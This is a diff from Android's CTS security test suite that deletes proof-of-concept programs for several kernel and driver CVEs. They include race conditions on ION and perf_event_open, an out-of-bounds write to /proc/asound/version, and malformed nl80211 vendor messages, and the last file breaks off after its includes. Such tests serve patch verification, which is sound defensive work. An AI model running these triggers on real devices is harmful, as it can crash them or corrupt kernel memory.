- unsigned int countable;
- unsigned long long value;
-};
-#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
- _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
-
-struct kgsl_perfcounter_read_compat {
- unsigned int reads;
- unsigned int count;
- unsigned int __pad[2];
-};
-
-#define CAL_IOCTL_MAGIC 'a'
-
-#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
-
-#define NL80211_ATTR_MAC 6
-#define ETH_ALEN 6
-
-struct nl_sock *nl_sk;
-#define NL80211_ATTR_IFINDEX 3
-enum wlan_hdd_tm_attr {
- WLAN_HDD_TM_ATTR_INVALID = 0,
- WLAN_HDD_TM_ATTR_CMD = 1,
- WLAN_HDD_TM_ATTR_DATA = 2,
- WLAN_HDD_TM_ATTR_STREAM_ID = 3,
- WLAN_HDD_TM_ATTR_TYPE = 4,
- /* keep last */
- WLAN_HDD_TM_ATTR_AFTER_LAST,
- WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
-};
-
-enum wlan_hdd_tm_cmd {
- WLAN_HDD_TM_CMD_WLAN_FTM = 0,
- WLAN_HDD_TM_CMD_WLAN_HB = 1,
-};
-
-typedef enum {
- /* don't use 0 as a valid subcommand */
- VENDOR_NL80211_SUBCMD_UNSPECIFIED,
-
- /* define all vendor startup commands between 0x0 and 0x0FFF */
- VENDOR_NL80211_SUBCMD_RANGE_START = 0x0001,
- VENDOR_NL80211_SUBCMD_RANGE_END = 0x0FFF,
-
- /* define all GScan related commands between 0x1000 and 0x10FF */
- ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START = 0x1000,
- ANDROID_NL80211_SUBCMD_GSCAN_RANGE_END = 0x10FF,
-
- /* define all RTT related commands between 0x1100 and 0x11FF */
- ANDROID_NL80211_SUBCMD_RTT_RANGE_START = 0x1100,
- ANDROID_NL80211_SUBCMD_RTT_RANGE_END = 0x11FF,
-
- ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START = 0x1200,
- ANDROID_NL80211_SUBCMD_LSTATS_RANGE_END = 0x12FF,
-
- ANDROID_NL80211_SUBCMD_TDLS_RANGE_START = 0x1300,
- ANDROID_NL80211_SUBCMD_TDLS_RANGE_END = 0x13FF,
-
- ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START = 0x1400,
- ANDROID_NL80211_SUBCMD_DEBUG_RANGE_END = 0x14FF,
-
- /* define all NearbyDiscovery related commands between 0x1500 and 0x15FF */
- ANDROID_NL80211_SUBCMD_NBD_RANGE_START = 0x1500,
- ANDROID_NL80211_SUBCMD_NBD_RANGE_END = 0x15FF,
-
- /* define all wifi calling related commands between 0x1600 and 0x16FF */
- ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START = 0x1600,
- ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_END = 0x16FF,
-
- /* define all NAN related commands between 0x1700 and 0x17FF */
- ANDROID_NL80211_SUBCMD_NAN_RANGE_START = 0x1700,
- ANDROID_NL80211_SUBCMD_NAN_RANGE_END = 0x17FF,
-
- /* define all packet filter related commands between 0x1800 and 0x18FF */
- ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START = 0x1800,
- ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_END = 0x18FF,
-
- /* This is reserved for future usage */
-
-} ANDROID_VENDOR_SUB_COMMAND;
-
-enum wl_vendor_subcmd {
- BRCM_VENDOR_SCMD_UNSPEC,
- BRCM_VENDOR_SCMD_PRIV_STR,
- GSCAN_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START,
- GSCAN_SUBCMD_SET_CONFIG,
- GSCAN_SUBCMD_SET_SCAN_CONFIG,
- GSCAN_SUBCMD_ENABLE_GSCAN,
- GSCAN_SUBCMD_GET_SCAN_RESULTS,
- GSCAN_SUBCMD_SCAN_RESULTS,
- GSCAN_SUBCMD_SET_HOTLIST,
- GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG,
- GSCAN_SUBCMD_ENABLE_FULL_SCAN_RESULTS,
- GSCAN_SUBCMD_GET_CHANNEL_LIST,
- ANDR_WIFI_SUBCMD_GET_FEATURE_SET,
- ANDR_WIFI_SUBCMD_GET_FEATURE_SET_MATRIX,
- ANDR_WIFI_RANDOM_MAC_OUI,
- ANDR_WIFI_NODFS_CHANNELS,
- ANDR_WIFI_SET_COUNTRY,
- GSCAN_SUBCMD_SET_EPNO_SSID,
- WIFI_SUBCMD_SET_SSID_WHITELIST,
- WIFI_SUBCMD_SET_LAZY_ROAM_PARAMS,
- WIFI_SUBCMD_ENABLE_LAZY_ROAM,
- WIFI_SUBCMD_SET_BSSID_PREF,
- WIFI_SUBCMD_SET_BSSID_BLACKLIST,
- GSCAN_SUBCMD_ANQPO_CONFIG,
- WIFI_SUBCMD_SET_RSSI_MONITOR,
- WIFI_SUBCMD_CONFIG_ND_OFFLOAD,
- RTT_SUBCMD_SET_CONFIG = ANDROID_NL80211_SUBCMD_RTT_RANGE_START,
- RTT_SUBCMD_CANCEL_CONFIG,
- RTT_SUBCMD_GETCAPABILITY,
- RTT_SUBCMD_GETAVAILCHANNEL,
- RTT_SUBCMD_SET_RESPONDER,
- RTT_SUBCMD_CANCEL_RESPONDER,
- LSTATS_SUBCMD_GET_INFO = ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START,
- DEBUG_START_LOGGING = ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START,
- DEBUG_TRIGGER_MEM_DUMP,
- DEBUG_GET_MEM_DUMP,
- DEBUG_GET_VER,
- DEBUG_GET_RING_STATUS,
- DEBUG_GET_RING_DATA,
- DEBUG_GET_FEATURE,
- DEBUG_RESET_LOGGING,
- DEBUG_TRIGGER_DRIVER_MEM_DUMP,
- DEBUG_GET_DRIVER_MEM_DUMP,
- DEBUG_START_PKT_FATE_MONITORING,
- DEBUG_GET_TX_PKT_FATES,
- DEBUG_GET_RX_PKT_FATES,
- DEBUG_GET_WAKE_REASON_STATS,
- WIFI_OFFLOAD_SUBCMD_START_MKEEP_ALIVE =
- ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START,
- WIFI_OFFLOAD_SUBCMD_STOP_MKEEP_ALIVE,
- APF_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START,
- APF_SUBCMD_SET_FILTER,
- /* Add more sub commands here */
- VENDOR_SUBCMD_MAX
-};
-
-#define QCA_NL80211_VENDOR_ID 0x001374
-#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST 70
-#define QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM 1
-#define QCA_NL80211_VENDOR_SUBCMD_PACKET_FILTER 83
-
-#define BPF_SET_RESET 1
-#define BPF_FILTER_ID 3
-#define BPF_PACKET_SIZE 4
-#define BPF_PROGRAM 6
-#define QCA_WLAN_GET_PACKET_FILTER 2
-
-#define GSCAN_ATTRIBUTE_NUM_BUCKETS 10
-#define GSCAN_ATTRIBUTE_CH_BUCKET_1 0
-#define GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS 15
-
-#define RTT_ATTRIBUTE_TARGET_CNT 0
-#define RTT_ATTRIBUTE_TARGET_CHAN 5
-#define RTT_ATTRIBUTE_TARGET_INFO 1
-
-#define GSCAN_ATTRIBUTE_WHITELIST_SSID 80
-#define GSCAN_ATTRIBUTE_NUM_WL_SSID 81
-#define GSCAN_ATTRIBUTE_WHITELIST_SSID_ELEM 84
-typedef int wifi_channel;
-typedef int wifi_channel_width_t;
-typedef struct wifi_channel_info {
- wifi_channel_width_t width;
- wifi_channel center_freq; /* primary 20 MHz channel */
- wifi_channel center_freq0; /* center freq (MHz) first segment */
- wifi_channel
- center_freq1; /* center freq (MHz) second segment valid for 80 + 80 */
-} wifi_channel_info_t;
-
-#define GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE 111
-#define GSCAN_ATTRIBUTE_ANQPO_HS_LIST 110
-#define GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID 114
-#define GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM 113
-
-int test(void);
-int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
- u_int8_t genl_version);
-
-int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
- u_int8_t genl_version) {
- struct nl_msg *msg;
- int ret = -1;
- unsigned char dst[ETH_ALEN];
- struct nlattr *rret;
- struct nlattr *rret2;
- struct nlattr *rret3;
- struct nlattr *rret4;
- unsigned char buf_test[256];
-
- int i = 0;
-
- wifi_channel_info_t c_info;
-
- unsigned char hb_params[512];
-#define DOT11_MAX_SSID_LEN 32
- unsigned char SSID11[DOT11_MAX_SSID_LEN];
- struct nl80211_sta_flag_update flags;
- msg = nlmsg_alloc();
- int if_index = if_nametoindex("wlan0");
-
-#define OUI_GOOGLE 0x001A11
-
- genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
-
- nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
-
- nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, OUI_GOOGLE);
-
- nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, GSCAN_SUBCMD_ANQPO_CONFIG);
-
- rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
-
- if (!rret) {
- return 1;
- }
-
- nla_put_u32(msg, GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE, 1);
-
- rret2 = nla_nest_start(msg, GSCAN_ATTRIBUTE_ANQPO_HS_LIST);
-
- if (!rret2) {
- return 1;
- }
-
- for (i = 0; i < 4; ++i) {
- rret3 = nla_nest_start(msg, GSCAN_ATTRIBUTE_ANQPO_HS_LIST);
-
- if (!rret3) {
- return 1;
- }
-
- nla_put(msg, GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM, 256, &buf_test);
- nla_nest_end(msg, rret3);
- }
-
- nla_nest_end(msg, rret2);
-
- nla_nest_end(msg, rret);
-
- ret = nl_send_auto_complete(nl_sk, msg);
-
- return 0;
-}
-
-#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
-#define AID_NET_RAW 3004 /* can create raw INET sockets */
-#define AID_NET_ADMIN 3005
-
-int test() {
- int fd = 0;
- int i = 0;
- int j = 0;
- int ret = 0;
- char *mem;
- int family_id = 0;
- struct audio_cal_basic *acb;
- struct sockaddr_nl saddr;
- int test = 0x1234;
-
- gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
- setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
-
- setuid(2000);
-
- nl_sk = nl_socket_alloc();
- ret = genl_connect(nl_sk);
- if (ret != 0) {
- return -1;
- }
-
- family_id = genl_ctrl_resolve(nl_sk, "nl80211");
-
- ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
-
- return 0;
-}
-
-int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
deleted file mode 100644
index 350e283..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-9120
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wno-unused-parameter -Wall -Werror
-LOCAL_CFLAGS += -Wno-incompatible-pointer-types
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
deleted file mode 100644
index c03ee45..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
+++ /dev/null
@@ -1,175 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-#include <errno.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <stdio.h>
-#include <dirent.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <sys/ioctl.h>
-#include <stdio.h>
-#include <string.h>
-#include <dlfcn.h>
-#include <sys/time.h>
-#include <sys/mman.h>
-#include <sys/syscall.h>
-#include <sys/resource.h>
-#include <fcntl.h>
-#include <pthread.h>
-#include <unistd.h>
-#include <sched.h>
-
-typedef int ion_user_handle_t;
-
-enum ion_heap_type {
- ION_HEAP_TYPE_SYSTEM,
- ION_HEAP_TYPE_SYSTEM_CONTIG,
- ION_HEAP_TYPE_CARVEOUT,
- ION_HEAP_TYPE_CHUNK,
- ION_HEAP_TYPE_DMA,
- ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
- are at the end of this enum */
- ION_NUM_HEAPS = 16,
-};
-
-#define ION_HEAP_SYSTEM_MASK (1 << ION_HEAP_TYPE_SYSTEM)
-#define ION_HEAP_SYSTEM_CONTIG_MASK (1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
-#define ION_HEAP_CARVEOUT_MASK (1 << ION_HEAP_TYPE_CARVEOUT)
-#define ION_HEAP_TYPE_DMA_MASK (1 << ION_HEAP_TYPE_DMA)
-
-#define ION_NUM_HEAP_IDS sizeof(unsigned int) * 8
-
-struct ion_allocation_data {
- size_t len;
- size_t align;
- unsigned int heap_id_mask;
- unsigned int flags;
- ion_user_handle_t handle;
-};
-
-
-struct ion_fd_data {
- ion_user_handle_t handle;
- int fd;
-};
-
-
-struct ion_handle_data {
- ion_user_handle_t handle;
-};
-
-
-struct ion_custom_data {
- unsigned int cmd;
- unsigned long arg;
-};
-#define ION_IOC_MAGIC 'I'
-
-#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \
- struct ion_allocation_data)
-
-#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
-
-
-#define ION_FLAG_CACHED 1 /* mappings of this buffer should be
- cached, ion will do cache
- maintenance when the buffer is
- mapped for dma */
-#define ION_FLAG_CACHED_NEEDS_SYNC 2 /* mappings of this buffer will created
- at mmap time, if this is set
- caches must be managed manually */
-
-int g_fd = -1;
-struct ion_allocation_data* g_allocation = NULL;
-struct ion_handle_data g_free_data;
-static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
-static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
-
-int open_driver() {
- char* dev_path = "/dev/ion";
- g_fd = open(dev_path, O_RDONLY);
- if (g_fd < 0) {
- printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
- } else {
- printf("[*] open file(%s) succ!\n", dev_path);
- }
- return g_fd;
-}
-
-void prepare_data() {
- void* data = malloc(0x1000);
-
- g_allocation = (struct ion_allocation_data*)data;
-
- g_allocation->len = 0x1000;
- g_allocation->align = 8;
- g_allocation->heap_id_mask = 1 << 25;
- g_allocation->flags = ION_FLAG_CACHED;
- g_allocation->handle = -1;
-
- mprotect(data, 0x1000, PROT_READ);
- printf("[*] mprotect, error = %d\n", errno);
-
- g_free_data.handle = 1;
-}
-
-void trigger_ion_alloc() {
- ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
-}
-
-void trigger_ion_free() {
- ioctl(g_fd, ION_IOC_FREE, &g_free_data);
-}
-
-void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
- setpriority(PRIO_PROCESS, gettid(), privi);
-
- /* bind process to a CPU*/
- if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
- }
-}
-void* race_thread(void* arg) {
- setup_privi_and_affinity(-19, 2);
- while (1) {
- pthread_mutex_lock(&mutex);
- pthread_cond_wait(&cond, &mutex);
- trigger_ion_free();
- pthread_mutex_unlock(&mutex);
- }
-
-}
-
-
-int main(int argc, char**argv) {
- if (open_driver() < 0) {
- return -1;
- }
- setup_privi_and_affinity(0, 1);
- prepare_data();
- pthread_t tid;
- pthread_create(&tid, NULL, race_thread, NULL);
- sleep(1);
- while (1) {
- pthread_cond_signal(&cond);
- usleep(100);
- trigger_ion_alloc();
- sleep(1);
- }
-
- return 0;
-}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
deleted file mode 100644
index 4addb61..0000000
--- a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2017-0403
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wno-unused-parameter -Wall -Werror
-LOCAL_CFLAGS += -Wno-format -Wno-unused-variable
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
deleted file mode 100644
index 51095e7..0000000
--- a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
+++ /dev/null
@@ -1,233 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-//overwrite object+0x20,like a list initilize
-#include <unistd.h>
-#include <sys/syscall.h>
-#include <string.h>
-#include <sys/wait.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <pthread.h>
-#include <sys/ioctl.h>
-
-
-struct perf_event_attr {
-
- /*
- * Major type: hardware/software/tracepoint/etc.
- */
- __u32 type;
-
- /*
- * Size of the attr structure, for fwd/bwd compat.
- */
- __u32 size;
-
- /*
- * Type specific configuration information.
- */
- __u64 config;
-
- union {
- __u64 sample_period;
- __u64 sample_freq;
- };
-
- __u64 sample_type;
- __u64 read_format;
-
- __u64 disabled : 1, /* off by default */
- inherit : 1, /* children inherit it */
- pinned : 1, /* must always be on PMU */
- exclusive : 1, /* only group on PMU */
- exclude_user : 1, /* don't count user */
- exclude_kernel : 1, /* ditto kernel */
- exclude_hv : 1, /* ditto hypervisor */
- exclude_idle : 1, /* don't count when idle */
- mmap : 1, /* include mmap data */
- comm : 1, /* include comm data */
- freq : 1, /* use freq, not period */
- inherit_stat : 1, /* per task counts */
- enable_on_exec : 1, /* next exec enables */
- task : 1, /* trace fork/exit */
- watermark : 1, /* wakeup_watermark */
- /*
- * precise_ip:
- *
- * 0 - SAMPLE_IP can have arbitrary skid
- * 1 - SAMPLE_IP must have constant skid
- * 2 - SAMPLE_IP requested to have 0 skid
- * 3 - SAMPLE_IP must have 0 skid
- *
- * See also PERF_RECORD_MISC_EXACT_IP
- */
- precise_ip : 2, /* skid constraint */
- mmap_data : 1, /* non-exec mmap data */
- sample_id_all : 1, /* sample_type all events */
-
- exclude_host : 1, /* don't count in host */
- exclude_guest : 1, /* don't count in guest */
-
- exclude_callchain_kernel : 1, /* exclude kernel callchains */
- exclude_callchain_user : 1, /* exclude user callchains */
- constraint_duplicate : 1,
-
- __reserved_1 : 40;
-
- union {
- __u32 wakeup_events; /* wakeup every n events */
- __u32 wakeup_watermark; /* bytes before wakeup */
- };
-
- __u32 bp_type;
- union {
- __u64 bp_addr;
- __u64 config1; /* extension of config */
- };
- union {
- __u64 bp_len;
- __u64 config2; /* extension of config1 */
- };
- __u64 branch_sample_type; /* enum perf_branch_sample_type */
-
- /*
- * Defines set of user regs to dump on samples.
- * See asm/perf_regs.h for details.
- */
- __u64 sample_regs_user;
-
- /*
- * Defines size of the user stack to dump on samples.
- */
- __u32 sample_stack_user;
-
- /* Align to u64. */
- __u32 __reserved_2;
-};
-
-
-#define PAIR_FD 1
-
-int group_fd[PAIR_FD],child_fd[PAIR_FD];
-
-long created = 0;
-long freed = 0;
-long finished = 0;
-
-void *thr(void *arg) {
- printf("id=%d arg=%d\n",gettid(),arg);
-
- int i;
- struct perf_event_attr attr;
-
- switch ((long)arg) {
- case 0:
- //#16123
- printf("thread 0\n");
- memset(&attr,0,sizeof(struct perf_event_attr));
- attr.type = 1;
- attr.size = sizeof(struct perf_event_attr);
- attr.config = 1;
-
- group_fd[0] = syscall(__NR_perf_event_open, &attr, 0x0ul, -1,
- -1, 0x1ul, 0);
-
- if(group_fd[0]<0){
- perror("perf-group:");
- }
-
-
- memset(&attr,0,sizeof(struct perf_event_attr));
- attr.type = 1;
- attr.size = sizeof(struct perf_event_attr);
- attr.config = 5;
-
- child_fd[0] = syscall(__NR_perf_event_open, &attr,0x0ul, 0x6ul, group_fd[0], 0x0ul, 0);
-
- if(group_fd[0]<0){
- perror("perf-child:");
- }
-
- created = 1;
- break;
- case 1:
-
- while(!created){
- sleep(1);
- }
-
- printf("thread 1\n");
- close(group_fd[0]);
-
- freed = 1;
-
- break;
- case 2:
-
- printf("thread 2\n");
-
- while(!freed){
- sleep(1);
- }
-
- close(child_fd[0]);
-
- finished = 1;
-
- break;
-
- }
- return 0;
-}
-
-int poc() {
- long i;
- pthread_t th[5];
- for (i = 0; i < 3; i++) {
- pthread_create(&th[i], 0, thr, (void *)i);
- usleep(10000);
- }
-
- while(!finished){
- sleep(1);
- }
-
- return 0;
-}
-
-
-int main(int argc, char const *argv[])
-{
- int pid;
- unsigned int times;
- times = 0;
- printf("POC3\n");
- printf("Please enable CONFIG_SLUB_DEBUG_ON and check the posion overwriten message in kernel\n");
- fflush(stdout);
-
- // while(1){
- pid = fork();
- if(pid){
- int status;
- int ret = waitpid(pid,&status,0);
-
- printf("[%d]times.\r",times);
- times++;
- }else
- return poc();
- // }
- return 0;
-}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
deleted file mode 100644
index 47c4c71..0000000
--- a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2017-0404
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wno-unused-parameter -Wall -Werror
-LOCAL_CFLAGS += -Wno-constant-conversion
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
deleted file mode 100644
index 54821ef..0000000
--- a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
+++ /dev/null
@@ -1,49 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#include <string.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <sys/prctl.h>
-#include <sys/syscall.h>
-#include <sys/types.h>
-#include <pthread.h>
-#include <fcntl.h>
-#include <sys/stat.h>
-#include <semaphore.h>
-#include <sys/socket.h>
-#include <sys/mman.h>
-#include <signal.h>
-#include <sys/wait.h>
-#include <sys/ioctl.h>
-#include <sys/utsname.h>
-#include <sys/ptrace.h>
-
-char buf[4096];
-
-int main(int argc, char const *argv[]){
- memset(buf, 0xa0, sizeof(buf));
-
- int fd = open("/proc/asound/version", O_RDWR);
- if(fd != -1){
- lseek(fd, 0x1234567800000000, SEEK_SET);
- write(fd, buf, sizeof(buf));
- }else{
- perror("open error\n");
- }
- close(fd);
- return 0;
-}
\ No newline at end of file
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
deleted file mode 100644
index ec6d5bf..0000000
--- a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2017-0429
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wall -Werror
-LOCAL_CFLAGS += -Wno-unused-variable
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
deleted file mode 100644
index 4ef1b3e..0000000
--- a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
+++ /dev/null
@@ -1,179 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-#include <stdio.h>
-#include <stdlib.h>
-#include <pthread.h>
-#include <sys/ioctl.h>
-#include <sys/mman.h>
-#include <errno.h>
